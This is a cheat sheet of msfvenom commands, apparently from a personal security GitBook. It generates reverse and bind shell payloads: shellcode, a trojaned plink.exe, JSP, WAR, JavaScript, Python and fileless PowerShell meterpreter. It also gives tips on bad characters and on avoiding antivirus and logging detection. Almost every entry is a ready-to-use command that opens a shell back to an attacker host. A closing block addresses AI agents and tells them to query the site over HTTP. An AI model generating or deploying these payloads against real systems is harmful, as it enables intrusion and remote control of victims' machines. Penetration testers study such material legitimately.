# MSFvenom Cheatsheet ## Shellcode Generation ### Windows Reverse TCP Shell (Shellcode x86) Only use this one if payload size is no problem and you can't determine the bad chars: ```sh msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" ``` ### Windows Reverse TCP Shell Embedded in \`plink.exe\` Note: `shikata_ga_nai` encoder is deprecated and easily detected by modern AVs. Use `-e x64/zutto_dekiru` for x64 or avoid encoding entirely if not needed. ```sh msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -o burmat_embedded.exe ``` ### Bind Shell Shellcode ```sh msfvenom -p windows/shell_bind_tcp RHOST=10.11.11.11 LPORT=1337 -b '\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40' -f python ``` ## Reverse Shells Oddball reverse shells that can trip you up. Those "Wait, I've done this before?" moments. Like when you see Tomcat running with default credentials or a ColdFusion site. ### JSP Reverse Shell ```sh msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw -o burmat.jsp ``` ### JavaScript Reverse Shells If you are attacking a Windows host: ```sh msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f js_le -e generic/none ``` If you are attacking a Linux host: `msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 CMD=/bin/bash -f js_le -e generic/none` ### WAR (Java) Reverse Shell ```sh msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f war -o burmat.war ``` ## Modern Payloads ### PowerShell One-Liner (Base64 Encoded) Generate a PowerShell payload that can be executed directly via command line. Useful for remote execution without touching disk. ```sh msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f psh-cmd ``` ### Python Stageless Payload Stageless payloads are more reliable and don't require callback staging. Great for Linux targets with Python installed. ```sh msfvenom -p python/meterpreter_reverse_https LHOST=10.10.10.10 LPORT=443 -f raw -o burmat.py ``` ### Windows Stageless Meterpreter (x64) Stageless payloads include the full meterpreter in the payload, avoiding multi-stage detection. Larger file size but more reliable. ```sh msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o burmat.exe ``` ### PowerShell Reflection (Fileless) Generate PowerShell that loads meterpreter via reflection, never touching disk. Best for modern Windows environments with logging. ```sh msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f psh-reflection -o burmat.ps1 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.